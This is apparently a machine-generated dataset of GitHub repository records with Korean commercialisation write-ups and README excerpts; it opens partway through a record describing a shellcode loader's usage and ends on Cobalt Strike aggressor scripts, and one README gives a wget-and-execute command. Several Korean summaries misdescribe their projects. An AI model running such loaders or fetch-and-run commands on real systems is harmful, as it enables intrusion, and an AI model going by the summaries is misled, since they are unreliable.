8080)，\n- 把图片放到起http服务的目录下，\n- 执行exe 参数为http服务的图片路径（xxx.exe http://127.0.0.1:8080/a.jpg) 。\n#### 上线方式2\n- 执行xxx.exe 参数为shellcode.txt里的内容 。\n###","composite_score":0.505,"license_safety_tag":"unknown"},{"name":"liuhuanyong/DomainWordsDict","github_url":"https://github.com/liuhuanyong/DomainWordsDict","stars":6,"language":"","license":"unknown","abandonment_months":58,"description":"# DomainWordsDict 저장소 분석\n\n## 왜 보물인가\n한국어 문서를 자동으로 이해하고 정리하는 인공지능 시스템을 만들 때 필수적인 '분야별 전문 단어 사전'을 무료로 제공하는 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **검색 엔진 서비스**: 전자상거래·의료·법률 등 분야별로 더 정확한 검색 결과를 제공하는 유료 검색 서비스\n2. **문서 자","readme_excerpt":"# 项目概述\nDomainWordsDict, Chinese words dict that contains more than 68 domains, which can be used as text classification、knowledge enhance task。涵盖68个领域、共计916万词的专业词典知识库，可用于文本分类、知识增强、领域词汇库扩充等自然语言处理应用。在利用学习模型进行自然语言处理任务时候，领域词汇可以作为一项重要的领域特征加入到模型当中，可以提升领域性模型的性能。  \n\n# 项目由来\n1、领域性是自然语言处理中十分重要的一类问题，不同的领域之间在文本形式、用词、表达上都存在差异。而领域词汇作为一个领域的表示是用来区分领域的常规手段，例如，在没有标注语料进行有监督的领域文本分类中，利用领域关键词进行匹配、计数、排序的方式即可以完成这一任务。   \n2、当前，纵观中文开放语言资源，并未有出现较大规模的领域性资源，如领域的wordembedding词向量、领域的关键词库。而这一资源在传统方法进行文本处理具有较大价值。    \n\n为了填补这一空白以及对领域性词库进行基础语言资源建设，本项目被提出。  \n\n# 数据来源\n通过对领域垂直网站的解析、领域文本的特征词提取，近几年来对领域词典的收集与整理，人工清洗等处理工作之后， 最终形成了数学科学、人力招聘、天文科学、餐饮食品、外语学习等共计68个领域，共计916万词的较大规模领域词汇库。\n\n# 数据介绍\n数据放在data文件夹下，共68个txt文件，每个文件以领域的名称命名。每个文件中的每一行包括两列(以tab符分开)，分别代表词语名称以及对应的权重。文件中的词语按照权重从大到小的方式排列，权重越高，该词对于领域的代表性或区分能力就越强。在使用的过程中，我们可以设定具体的权重域值在选用不同的词语来用于特定任务。    \n\n\n# 词典样例\n\n|序号|领域|个数|举例| \n| :-----| :-----| ---- | :---- |\n|1|数学科学|17,287|定义域、值域、半群、悖论、本原多项式、闭包、变换群、边连通度、不变因子、差集、超滤子、存在量词、代数、代数闭域、单射|\n|2|人力招聘|447,606|销售代表、产品经理、销售经理、电话销售、阿里云、客户经理、销售精英、销售工程","composite_score":0.505,"license_safety_tag":"unknown"},{"name":"JetBrains/create-react-kotlin-app","github_url":"https://github.com/JetBrains/create-react-kotlin-app","stars":6,"language":"JavaScript","license":"MIT","abandonment_months":40,"description":"# JetBrains/create-react-kotlin-app 평가 분석\n\n## 왜 보물인가\n웹 개발과 모바일 개발을 동시에 할 수 있는 통합 개발 환경으로, 한 번의 코드 작성으로 여러 플랫폼에서 동작하는 애플리케이션을 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 웹 기반 협업 도구나 프로젝트 관리 플랫폼을 개발하고, 동","readme_excerpt":"[![Build Status](https://teamcity.jetbrains.com/app/rest/builds/buildType:JetBrainsUi_CreateReactKotlinApp/statusIcon.svg)](https://teamcity.jetbrains.com/viewType.html?buildTypeId=JetBrainsUi_CreateReactKotlinApp&guest=1)\n[![JetBrains team project](http://jb.gg/badges/team.svg)](https://confluence.jetbrains.com/display/ALL/JetBrains+on+GitHub)\n\n[Japanese](https://github.com/JetBrains/create-react-kotlin-app/blob/master/README-ja.md)\n[Korean](https://github.com/JetBrains/create-react-kotlin-app/blob/master/README-ko.md)\n\n# Create React Kotlin App\n\nCreate [React](https://facebook.github.io/react/) apps in [Kotlin](https://kotlinlang.org/) with no build configuration.\n\nPlease note that this is an **early preview version**.\n\n## Quick Overview\n\n**Make sure you have [JDK 8 or newer version](http://www.oracle.com/technetwork/java/index.html) installed before proceeding.** \n\nCreate a new project:\n\n```sh\nnpx create-react-kotlin-app my-app\n```\n([npx](https://medium.com/@maybekatz/introducing-np","composite_score":0.505,"license_safety_tag":"safe"},{"name":"igorbrigadir/twitter-advanced-search","github_url":"https://github.com/igorbrigadir/twitter-advanced-search","stars":6,"language":"","license":"unknown","abandonment_months":28,"description":"# Twitter 고급 검색 도구 - 수익화 분석\n\n## 왜 보물인가\n트위터에서 원하는 정보를 정확하게 찾기 어려운 사람들을 위해 검색 기능을 훨씬 강력하게 만들어주는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기자나 마케터가 월 구독으로 이용하는 \"트위터 고급 검색 플랫폼\" 운영\n2. **내부 업무 도구**: 기업의 소셜미디어 ","readme_excerpt":"# 🔍 Advanced Search on Twitter\n\n[![👀](https://repository-images.githubusercontent.com/200083171/7d2f7d80-b492-11e9-8f1b-4a5863429dca)](https://twitter.com/search-advanced)\n\nThese operators work on [Web](https://twitter.com/search-advanced), [Mobile](https://mobile.twitter.com/search-advanced), [Tweetdeck](https://tweetdeck.twitter.com/).\n\nThere is some overlap, but largely these will **not work** for [v1.1 Search](https://developer.twitter.com/en/docs/twitter-api/v1/tweets/search/overview), [Premium Search](https://developer.twitter.com/en/docs/twitter-api/premium/search-api/overview), or [v2 Search](https://developer.twitter.com/en/docs/twitter-api/tweets/search/introduction) APIs.\n\nAdapted from [TweetDeck Help](https://help.twitter.com/en/using-twitter/advanced-tweetdeck-features), @lucahammer [Guide](https://freshvanroot.com/blog/2019/twitter-search-guide-by-luca/), @eevee [Twitter Manual](https://eev.ee/blog/2016/02/20/twitters-missing-manual/), @pushshift and Twitter / Tweetdeck i","composite_score":0.505,"license_safety_tag":"unknown"},{"name":"xiyaowong/freeFQ","github_url":"https://github.com/xiyaowong/freeFQ","stars":8,"language":"","license":"unknown","abandonment_months":41,"description":"# freeFQ 저장소 분석\n\n## 왜 보물인가\n인터넷 접근이 제한된 지역의 사용자들이 자유롭게 온라인에 접속할 수 있도록 돕는 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **VPN/프록시 서비스**: 개인 사용자를 위한 구독형 인터넷 접근 도구로 운영\n2. **기업 보안 솔루션**: 직원들의 안전한 인터넷 사용을 위한 내부 시스템으로 구축\n3. **국제","readme_excerpt":"","composite_score":0.505,"license_safety_tag":"unknown"},{"name":"icexin/eggos","github_url":"https://github.com/icexin/eggos","stars":5,"language":"Go","license":"MIT","abandonment_months":35,"description":"# icexin/eggos 저장소 분석\n\n## 왜 보물인가\n컴퓨터의 기본 운영체제를 처음부터 직접 만드는 교육용 프로젝트로, 컴퓨터 내부 동작 원리를 배울 수 있는 실제 동작하는 학습 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **대학 전공 교육 플랫폼**: 컴퓨터 공학과 학생들을 위한 운영체제 강좌 교재 및 실습 자료로 활용\n2. **개발자 온라인 교육","readme_excerpt":"<h1 align=\"center\">\n    <img src=\"./assets/files/eggos.png\" />\n</h1>\n\n![CI](https://github.com/icexin/eggos/workflows/CI/badge.svg)\n\n[中文说明](README_CN.md)\n\nA Go unikernel running on x86 bare metal\n\nRun Go applications on x86 bare metal, written entirely in Go (only a small amount of C and some assembly), support most features of Go (like GC, goroutine) and standard libraries, also come with a network stack that can run most `net` based libraries.\n\nThe entire kernel is a go application running on ring0. There are no processes and process synchronization primitives, only goroutines and channels. There is no elf loader, but there is a Javascript interpreter that can run js script files, and a WASM interpreter will be added to run WASM files later.\n\n# Background\n\nGo's runtime provides some basic operating system abstractions. Goroutine corresponds to processes and channel corresponds to inter-process communication. In addition, go has its own virtual memory management, so the idea of runnin","composite_score":0.505,"license_safety_tag":"safe"},{"name":"benaadams/Ben.Demystifier","github_url":"https://github.com/benaadams/Ben.Demystifier","stars":6,"language":"C#","license":"Apache-2.0","abandonment_months":27,"description":"# Ben.Demystifier 상용화 분석\n\n## 왜 보물인가\n프로그램이 실행되다가 오류가 났을 때, 그 원인을 개발자가 쉽게 이해할 수 있도록 번역해주는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 소프트웨어 개발 교육 플랫폼이 강좌 중 학생들의 오류를 자동으로 진단해주는 기능 추가\n2. **내부 업무 도구**: IT 회사의 기","readme_excerpt":"# Ben.Demystifier\n[![NuGet version (Ben.Demystifier)](https://img.shields.io/nuget/v/Ben.Demystifier.svg?style=flat-square)](https://www.nuget.org/packages/Ben.Demystifier/)\n[![build](https://github.com/benaadams/Ben.Demystifier/workflows/Demystifier%20PR%20Build/badge.svg)](https://github.com/benaadams/Ben.Demystifier/actions)\n\nOutput the modern C# 7.0+ features in stack traces that looks like the C# source code that generated them rather than IL formatted.\n\n## High performance understanding for stack traces \n\n.NET stack traces output the compiler transformed methods; rather than the source code methods, which make them slow to mentally parse and match back to the source code.\n\nThe current output was good for C# 1.0; but has become progressively worse since C# 2.0 (iterators, generics) as new features are added to the .NET languages and at C# 7.1 the stack traces are esoteric (see: [Problems with current stack traces](#problems-with-current-stack-traces)).\n\n### Make error logs more pr","composite_score":0.505,"license_safety_tag":"safe"},{"name":"rvamsikrishna/flutter_ui_challenge_planets_app","github_url":"https://github.com/rvamsikrishna/flutter_ui_challenge_planets_app","stars":5,"language":"Dart","license":"MIT","abandonment_months":46,"description":"# Flutter 행성 앱 UI 챌린지 프로젝트 분석\n\n## 왜 보물인가\n멋진 우주 테마의 앱 디자인 샘플로, 모바일 앱의 아름다운 화면을 만들고 싶은 사람들이 참고할 수 있는 실제 코드 예제입니다.\n\n## 어디에 쓸 수 있나\n- **교육 플랫폼**: 모바일 앱 디자인을 배우는 학생들이 실제 프로젝트를 따라하며 배우는 튜토리얼 자료로 제공\n- **UI 템플","readme_excerpt":"\n## Flutter UI challenge - planets app\nRecreated the design by [Anto Skvortsovn ](https://dribbble.com/shots/4220958-xore-solar-system)\n\n![ezgif com-video-to-gif (3)](https://user-images.githubusercontent.com/31307345/59754277-6565b680-92a3-11e9-81f9-d8b9161b1732.gif)\n\n\n\n![2nd page](https://lh3.googleusercontent.com/-SOVGujMREgf4VcXFUg1MpAU_Zy7p_-94-ysOgJAu3RhefEiWtPekGYUhPiKRiWkfNl-2_4vRUe6)\n\n\n![details page](https://lh3.googleusercontent.com/1gbaYViEHLogYVCpVxJuDVchs186PzMBH87yXd-X3_RYFuct_J7PWSO8Z7f2lv1Piovq8q2BKWiH)\n\nFor help getting started with Flutter, view the online\n[documentation](https://flutter.io/).\n","composite_score":0.5049,"license_safety_tag":"safe"},{"name":"HyeminNoh/Tech-Stack","github_url":"https://github.com/HyeminNoh/Tech-Stack","stars":6,"language":"","license":"unknown","abandonment_months":42,"description":"# HyeminNoh/Tech-Stack 상용화 분석\n\n## 왜 보물인가\n개발자들이 자신의 기술 스택(사용하는 프로그래밍 언어, 도구, 플랫폼)을 체계적으로 정리하고 공유할 수 있는 플랫폼입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개발자 커뮤니티가 기술 스택을 프로필에 등록하고 검색할 수 있는 개발자 포트폴리오 플랫폼\n2. **내부 ","readme_excerpt":"# 📚 Tech-Stack\n\n##### 신입 개발자로서 성장을 위한 전공 지식을 정리합니다 :blush:\n\n**Collaborators** : [HyeminNoh](https://github.com/HyeminNoh), [SohyeonJang](https://github.com/shjang1013), [YoungcheolPark](https://github.com/dudcheol)  \n**Commit convention rule** : 상태-파일명-상세내용  \n`ex) Add/Update/Delete FileName contents`  \n<br>\n\n## 📒 Language  \n\n- ### 📖 JAVA\n    * [자바란?](./docs/Java/Java.md)\n    * [자바와 C의 차이점](./docs/Java/DiffToJavaAndC.md)\n    * [JVM](./docs/Java/JVM(Java_Virtual_Machine).md)\n    * [GC(GarbageCollection)](./docs/Java/GarbageCollection.md)  \n    * [연산자](./docs/Java/Operator.md)\n    * [클래스와 객체](./docs/Java/Class_and_Object.md)\n    * [오버로딩과 오버라이딩](./docs/Java/Overloading_and_Overriding.md)\n    * [상속](./docs/Java/Inheritance.md)\n    * [제어자](./docs/Java/Modifier.md)\n    * [다형성](./docs/Java/Polymorphism.md)\n    * [String과 StringBuffer, StringBuilder](./docs/Java/String.md)  \n    * [컬렉션](./docs/Java/Collections.md)\n    * [지네릭스](./docs/Java/Generics.md)  \n    * [람다 표현식](./docs/Java/Lambda.md)  \n ","composite_score":0.5049,"license_safety_tag":"unknown"},{"name":"binji/pokegb","github_url":"https://github.com/binji/pokegb","stars":128,"language":"C++","license":"MIT","abandonment_months":28,"description":"# pokegb 프로젝트 분석\n\n## 왜 보물인가\n포켓몬스터의 초대 게임을 현대적 기술로 복제한 오픈소스 프로젝트로, 클래식 게임을 새로운 플랫폼에서 즐기고 배울 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **게임 에뮬레이션 SaaS**: 브라우저에서 직접 플레이할 수 있는 구독형 '클래식 게임 스트리밍 서비스' 운영\n2. **게임 개발 교육 도구**","readme_excerpt":"# pokegb\n\nA gameboy emulator that only plays Pokemon Blue, in ~50 lines of c++.\n\nSee the [technical write-up](https://binji.github.io/posts/pokegb/).\n\n## Features\n\nPlays Pokemon Blue (and Red).\n\n## Screenshots\n\n![1](img/o1.gif)\n![2](img/o2.gif)\n![3](img/o3.gif)\n![4](img/o4.gif)\n![5](img/o5.gif)\n![6](img/o6.gif)\n![7](img/o7.gif)\n![8](img/o8.gif)\n![9](img/o9.gif)\n![10](img/o10.gif)\n![11](img/o11.gif)\n\n![Source Code](img/pokegb.png)\n\n## Building\n\nOnly builds on Linux and macOS AFAIK.\n\n```\n$ make\n```\n\nOn macOS, you'll need to create a save file too (just the first time):\n\n```\n$ make rom.sav\n```\n\n## Running\n\nGet a Pokemon Blue (or Pokemon Red) ROM file. The files that are known to work have the following sha1s:\n\n| Name | sha1 |\n| - | - |\n| Pokemon - Blue Version (USA, Europe) (SGB Enhanced).gb | `d7037c83e1ae5b39bde3c30787637ba1d4c48ce2` |\n| Pokemon - Red Version (USA, Europe) (SGB Enhanced).gb | `ea9bcae617fdf159b045185467ae58b2e4a48b9a` |\n\nOthers might work too, but these are the ones tha","composite_score":0.5049,"license_safety_tag":"safe"},{"name":"cryptopunksnotdead/programming-cryptopunks","github_url":"https://github.com/cryptopunksnotdead/programming-cryptopunks","stars":10,"language":"Ruby","license":"CC0-1.0","abandonment_months":27,"description":"# cryptopunksnotdead/programming-cryptopunks 분석\n\n## 왜 보물인가\n암호화폐 분야의 아이콘인 'CryptoPunks'라는 디지털 자산을 프로그래밍으로 직접 다루고 생성할 수 있는 기술 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **NFT 생성 플랫폼**: 사용자가 직접 CryptoPunks 스타일의 디지털 자산을 만들","readme_excerpt":"\nNote: See [**/punks.whitelabel**](https://github.com/cryptopunksnotdead/punks.whitelabel) -\nThe Free White Label Punk Quick Starter Edition - if you want to (re)create from zero / scratch a pixel-perfect copy of the 10 000 Matt & John's® punks collection (anno 2017).\n\n---\n\nCrypto Collectibles Series -\n[Cats](https://github.com/cryptocopycats/programming-mooncats) ·\n[Kitties](https://github.com/cryptocopycats/programming-cryptokitties) ·\n[Punks](https://github.com/cryptopunksnotdead/programming-cryptopunks) ·\n[(Modern Art) Spot Paintings](https://github.com/currencyart/currencyart-howto)\n\n\n\n# Programming (Crypto) Pixel Punk Profile Pictures & (Generative) Art - Step-by-Step Book / Guide\n\n_Inside Unique 24×24 Pixel Art on (and off) the Blockchain..._\n\nby [Gerald Bauer](https://github.com/geraldb), et al\n\n- [Do-It-Yourself (DIY) - Yes, You Can! - Crop & Save Your Own Punks in Original 24x24 Pixel Format or With 2X / 4X / 8X Zoom](01_crop.md)\n- [Statistics, Statistics, Statistics - Calcul","composite_score":0.5049,"license_safety_tag":"unknown"},{"name":"cezarypiatek/MappingGenerator","github_url":"https://github.com/cezarypiatek/MappingGenerator","stars":5,"language":"C#","license":"MIT","abandonment_months":53,"description":"# MappingGenerator 상용화 분석\n\n## 왜 보물인가\n프로그래머들이 반복적으로 작성해야 하는 데이터 변환 코드를 자동으로 생성해주어 개발 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 엔터프라이즈 소프트웨어 개발 회사가 자동 코드 생성 기능을 제품에 내장하여 고객의 개발 생산성 향상\n2. **내부 업","readme_excerpt":"## WHY THIS PROJECT IS ARCHIVED - EXPLANATION\n------------------------------\nMappingGenerator is discontinued in the form of FOSS. I spent the last three months (March 2021 - June 2021) working hard on improving MappingGenerator. I solved many issues and added a bunch of new cool features. I also made a general refactoring which restored the project maintainability. All of that cost me a lot of my private time and I did it all by myself, so I decided to convert MappingGenerator into a commercial product. A perpetual license for a new version of MappingGenerator can be obtained via the official product website https://www.mappinggenerator.net/\n\nI would like to thank all of you who contributed to this product by reporting issues, testing, authoring PRs, or buying me coffee. **PR authors (except the Only README Updaters) and Coffee Buyers will be awarded with a special license for MappingGenerator for free -  I will send them an email with details in a few days.**\n\n🔥 Important Links: \n\n- ","composite_score":0.5049,"license_safety_tag":"safe"},{"name":"rscloura/Doldrums","github_url":"https://github.com/rscloura/Doldrums","stars":7,"language":"Python","license":"unknown","abandonment_months":50,"description":"# Doldrums 저장소 분석\n\n## 왜 보물인가\n구체적인 설명과 문서가 없어 실제 목적과 가치를 파악하기 어려우며, 2022년 이후 업데이트가 중단되어 현재 활용 가능성이 불명확합니다.\n\n## 어디에 쓸 수 있나\n1. **내부 업무 도구**: 팀의 반복적인 작업을 자동화하는 회사 내부용 시스템으로 활용 가능\n2. **API 판매**: 특정 기능이 명확하","readme_excerpt":"<img src=\"https://raw.githubusercontent.com/rscloura/Doldrums/master/logo.png\" width=\"518\" height=\"150\">\n\n*To flutter: to move in quick, irregular motions, to beat rapidly, to be agitated.*  \n*Doldrums: a period of stagnation.*\n\nDoldrums is a reverse engineering tool for Flutter apps targetting Android. Concretely, it is a parser and information extractor for the Flutter/Dart Android binary, conventionally named `libapp.so`, for all Dart version 2.10 releases. When run, it outputs a full dump of all classes present in the isolate snapshot.\n\nThe tool is currently in **beta**, and missing some deserialization routines and class information. If it does not work out-of-the-box, please let me know.\n\n## Dependencies\n\nDoldrums requires [pyelftools](https://github.com/eliben/pyelftools) to parse the ELF format. You can install it with\n```\npip3 install pyelftools\n```\n\n## Usage\n\nTo use, simply run the following command, substituting `libapp.so` for the appropriate binary, and `output` for the de","composite_score":0.5049,"license_safety_tag":"unknown"},{"name":"mojodna/heroku-buildpack-jemalloc","github_url":"https://github.com/mojodna/heroku-buildpack-jemalloc","stars":7,"language":"Shell","license":"BSD-3-Clause","abandonment_months":83,"description":"# heroku-buildpack-jemalloc 상품화 분석\n\n## 왜 보물인가\n웹 애플리케이션의 속도를 크게 향상시키는 메모리 최적화 도구로, 특히 대규모 트래픽을 처리하는 기업들에게 성능 개선과 비용 절감을 동시에 제공합니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 실시간 데이터 분석 플랫폼이 메모리 효율을 높여 더 많은 고객을 같","readme_excerpt":"# heroku-buildpack-jemalloc\n\nI am a Heroku buildpack that installs\n[jemalloc](http://www.canonware.com/jemalloc/) into a dyno slug.\n\n## Unmaintained :wave:\n\nThis Heroku buildpack is no longer actively maintained. It should continue to\nwork but won't see changes as updates to Heroku or jemalloc are released.\n\nConsider switching to [gaffneyc/heroku-buildpack-jemalloc](https://github.com/gaffneyc/heroku-buildpack-jemalloc/)\nif you run into problems or want to try a [newer release of jemalloc](https://github.com/jemalloc/jemalloc/releases).\n\n## Using\n\nTo use jemalloc with your app, either prefix commands with `jemalloc.sh <cmd>`\nor set `LD_PRELOAD=/app/vendor/jemalloc/lib/libjemalloc.so.1` in your\nenvironment (it will then apply to all commands run).\n\nExample, in your Procfile:\n\n```\nweb: jemalloc.sh bundle exec puma -C config/puma.rb\n```\n\nSetting LD_PRELOAD can sometimes mess with the building of an app - if you're seeing errors during slug compilation, try removing LD_PRELOAD and just usi","composite_score":0.5049,"license_safety_tag":"safe"},{"name":"huggingface/awesome-papers","github_url":"https://github.com/huggingface/awesome-papers","stars":9,"language":"","license":"unknown","abandonment_months":68,"description":"# huggingface/awesome-papers 분석\n\n## 왜 보물인가\n인공지능 분야의 최신 논문들을 한곳에 모아놓은 '디지털 도서관'으로, 이 분야의 핵심 지식을 빠르게 찾을 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 연구자/학생을 위한 논문 추천 플랫폼 (월 구독으로 최신 논문 자동 정리)\n2. **내부 업무 도구**:","readme_excerpt":"# Awesome NLP Paper Discussions\n\nThe Hugging Face team believes that we can reach our goals in NLP by building powerful open source tools and by conducting impactful research. Our team has begun holding regular internal discussions about awesome papers and research areas in NLP. In the spirit of open science, we've decided to share these discussion materials with the community.\n\n_Note: These science day discussions are held offline with no physical presentation or discussion to provide. However, some presentation materials do include limited comments from our team or summaries of internal discussions._\n\nSee [planned future discussions](#planned-discussions) below.\n\n#### August 12, 2020\n- **Paper**: [Pre-training via Paraphrasing](https://arxiv.org/abs/2006.15020)\n- **Authors**: [Mike Lewis](https://twitter.com/ml_perception), [Marjan Ghazvininejad](https://twitter.com/gh_marjan), [Gargi Ghosh](https://twitter.com/gargighosh), Armen Aghajanyan, [Sida Wang](https://twitter.com/sidawxyz),","composite_score":0.5049,"license_safety_tag":"unknown"},{"name":"williamboman/nvim-lsp-installer","github_url":"https://github.com/williamboman/nvim-lsp-installer","stars":11,"language":"Lua","license":"Apache-2.0","abandonment_months":43,"description":"# nvim-lsp-installer 비즈니스 분석\n\n## 왜 보물인가\n프로그래머들이 코딩할 때 사용하는 개발 도구(Neovim)의 필수 기능을 자동으로 설치해주는 편의 솔루션입니다.\n\n## 어디에 쓸 수 있나\n\n1. **개발자 온보딩 SaaS**: 신입 프로그래머가 입사 첫날 개발 환경을 5분 안에 자동 구성하는 서비스\n2. **기업 IT 자산 관리 도구","readme_excerpt":"## ℹ️ Project status\n\n> This is an excerpt from the [announcement here](https://github.com/williamboman/nvim-lsp-installer/discussions/876).\n\n_`nvim-lsp-installer` is no longer maintained._\n\n[`mason.nvim`](https://github.com/williamboman/mason.nvim) is the next generation version of `nvim-lsp-installer`. It\nbuilds on top of the very same foundation as `nvim-lsp-installer` (which means it's easy to migrate), but with a\nmajority of internals refactored to improve extensibility and testability.\n\nMore importantly, the scope of `mason.nvim` has also been widened to target more than just LSP servers. `mason.nvim`\nsupports DAP servers, linters, formatters, and more. As of writing, `mason.nvim` provides 150+ packages for 100+\nlanguages. It can be thought of as a general-purpose package manager, native to Neovim, that runs everywhere Neovim runs\n(Windows, macOS, Linux, etc.).\n\nAnother big change with `mason.nvim` is that executables are now linked to a single, shared, location, allowing seamles","composite_score":0.5049,"license_safety_tag":"safe"},{"name":"iamnotturner/vaccipy","github_url":"https://github.com/iamnotturner/vaccipy","stars":19,"language":"Python","license":"MIT","abandonment_months":56,"description":"# vaccipy 저장소 분석\n\n## 왜 보물인가\n백신 접종 일정을 자동으로 관리해주는 도구로, 개인과 단체가 복잡한 예방접종 계획을 쉽게 추적할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **병원/클리닉 관리 SaaS**: 의료기관이 환자들의 백신 접종 일정을 자동 알림하고 추적하는 클라우드 서비스\n2. **기업 보건 관리 도구**: 대기업이 직원들의","readme_excerpt":"# Danke, Ende.\n\n> Wow, was für ein Jahr. Angefangen im März als privates Projekt für Freunde und Familie, wurden \n> unsere Releases bis heute (Sonntag, 17.10.2021) \n> [knapp 40.000 Mal gedownloadet](https://hanadigital.github.io/grev/?user=iamnotturner&repo=vaccipy) \n> und unglaubliche \n> [6.465 € für für Ärzte ohne Grenzen](https://www.aerzte-ohne-grenzen.de/sich-engagieren/spendenaktion/online?cfd=pjs3m) \n> gesammelt.\n> \n> Ende September haben die letzten Impfzentren geschlossen und die [Seite des Impftermin-Services](https://www.impfterminservice.de/danke) \n> ist zu einer Landingpage mit Danksagungen geschrumpft. Damit ist unser Dienst getan und ich \n> möchte ebenfalls **ein großes Dankeschön** an alle aussprechen, die sich an `vaccipy` \n> beteiligten. Persönlich war das mein erstes Open-Source-Projekt, an dem ich *so richtig* \n> mitgearbeitet habe. Ich konnte viel lernen und es hat mir sehr Spaß gemacht, mit euch gemeinsam an Lösungen zu tüfteln. \n> Hoffentlich konntet ihr ebenfall","composite_score":0.5049,"license_safety_tag":"safe"},{"name":"brainly/html-sketchapp","github_url":"https://github.com/brainly/html-sketchapp","stars":13,"language":"JavaScript","license":"MIT","abandonment_months":42,"description":"# brainly/html-sketchapp 평가 보고서\n\n## 왜 보물인가\n웹 디자인 파일을 자동으로 Sketch(디자인 도구)로 변환해주는 기술로, 디자이너와 개발자 간 협업 시간을 획기적으로 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **디자인 협업 SaaS**: 웹사이트 스크린샷을 자동으로 편집 가능한 디자인 파일로 변환하는 온라인 서비스","readme_excerpt":"# html-sketchapp [![Build Status](https://travis-ci.org/html-sketchapp/html-sketchapp.svg?branch=master)](https://travis-ci.org/html-sketchapp/html-sketchapp) [![npm version](https://badgen.now.sh/npm/v/@brainly/html-sketchapp)](https://www.npmjs.com/package/@brainly/html-sketchapp) [![MIT license](https://badgen.now.sh/badge/license/MIT/blue)](https://github.com/brainly/html-sketchapp/blob/master/LICENSE.md) [![npm downloads](https://badgen.now.sh/npm/dm/@brainly/html-sketchapp)](https://www.npmjs.com/package/@brainly/html-sketchapp)\n\nHTML to Sketch export solution.\n\n<div align=\"center\">\n  <img alt=\"html-sketchapp\" src=\"https://i.imgur.com/TeMMW8b.png\" height=\"200\" />\n</div>\n\n## What it can do?\n\nhtml-sketchapp turns HTML nodes into Sketch layers or symbols. Additionally, it allows to export shared text styles and document colors.\n\n<img src=\"https://i.imgur.com/yPjMwFU.png\" width=\"100%\" />\n\n## Why?\n\nThe motivation behind this project was ability to easily share Front-End style guide wi","composite_score":0.5049,"license_safety_tag":"safe"},{"name":"luoxue-bot/warp_auto_change_ip","github_url":"https://github.com/luoxue-bot/warp_auto_change_ip","stars":6,"language":"Shell","license":"unknown","abandonment_months":55,"description":"# warp_auto_change_ip 상품화 분석\n\n## 왜 보물인가\n인터넷 사용 시 자동으로 위치 정보를 바꿔주는 기술로, 온라인 개인정보 보호가 중요한 시대에 수요가 증가하고 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 월 구독 형태의 VPN 서비스로 개인과 기업 사용자에게 판매\n- **내부 업무 도구**: 대기업 보안팀이 직원들","readme_excerpt":"# warp_auto_change_ip\n\n## Describtion\nThis is a script for warp.\n\nYou can use it to change your IP of warp which was blocked by Netflix.\n\n## What's more\nMost of the code comes from the streaming media detection script of lmc999, thank you very much!\n\nAt present, it is possible to lock the region (for example, if the Singapore IP is locked, the IP will be changed again after being assigned to the Japanese IP until the IP is Singaporean).\n\nAfter the changeing is completed, it will continue to monitor (every 10s, you can change it by yourself), and you can put it on the screen for background execution.\n\nIf you need one-time use, change sleep 10 to break.\n\nYou'd better use the range of IPv4 of 193, it can better unlock the streaming media, if he is not clear, please use my script to install warp.\n\n## How to use\n```bash\nwget https://github.com/luoxue-bot/warp_auto_change_ip/raw/main/warp_change_ip.sh && chmod +x warp_change_ip.sh && ./warp_change_ip.sh\n```\n\nPS：Will use the result of directl","composite_score":0.5048,"license_safety_tag":"unknown"},{"name":"erikalu/omnimatte","github_url":"https://github.com/erikalu/omnimatte","stars":25,"language":"Python","license":"Apache-2.0","abandonment_months":57,"description":"# Omnimatte 저장소 분석\n\n## 왜 보물인가\n동영상에서 움직이는 물체만 깔끔하게 추출해주는 기술로, 영상 제작이나 광고 편집 시간을 획기적으로 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 유튜브 크리에이터나 마케팅팀이 배경 제거 없이 피사체만 자동으로 뽑아내는 온라인 동영상 편집 플랫폼\n2. **내부 업무 도구**","readme_excerpt":"# Omnimatte in PyTorch\n\nThis repository contains a re-implementation of the code for the CVPR 2021 paper \"[Omnimatte: Associating Objects and Their Effects in Video](https://omnimatte.github.io/).\"\n\n<img src='./img/teaser.gif' height=\"260px\"/>\n\n\n## Prerequisites\n- Linux\n- Python 3.6+\n- NVIDIA GPU + CUDA CuDNN\n\n## Installation\nThis code has been tested with PyTorch 1.8 and Python 3.8.\n\n- Install [PyTorch](http://pytorch.org) 1.8 and other dependencies.\n  - For pip users, please type the command `pip install -r requirements.txt`.\n  - For Conda users, you can create a new Conda environment using `conda env create -f environment.yml`.\n    \n## Demo\nTo train a model on a video (e.g. \"tennis\"), run:\n```bash\npython train.py --name tennis --dataroot ./datasets/tennis --gpu_ids 0,1\n```\nTo view training results and loss plots, visit the URL http://localhost:8097.\nIntermediate results are also at `./checkpoints/tennis/web/index.html`.\n\nTo save the omnimatte layer outputs of the trained model, run:","composite_score":0.5048,"license_safety_tag":"safe"},{"name":"z1un/Z1-AggressorScripts","github_url":"https://github.com/z1un/Z1-AggressorScripts","stars":9,"language":"VBScript","license":"unknown","abandonment_months":61,"description":"# Z1-AggressorScripts 상용화 분석\n\n## 왜 보물인가\n네트워크 침입 테스트와 보안 점검을 자동화할 수 있는 도구로, 기업의 사이버 보안 취약점을 발견하는 데 필수적입니다.\n\n## 어디에 쓸 수 있나\n1. **보안 진단 서비스 플랫폼**: 기업 IT시스템의 보안 취약점을 자동으로 검사해주는 클라우드 서비스로 운영\n2. **기업 IT 관리 도","readme_excerpt":"# Z1-AggressorScripts\n\n![](https://img.shields.io/badge/Z1-AggressorScripts-red.svg)  ![](https://img.shields.io/github/languages/top/z1un/Z1-AggressorScripts.svg)  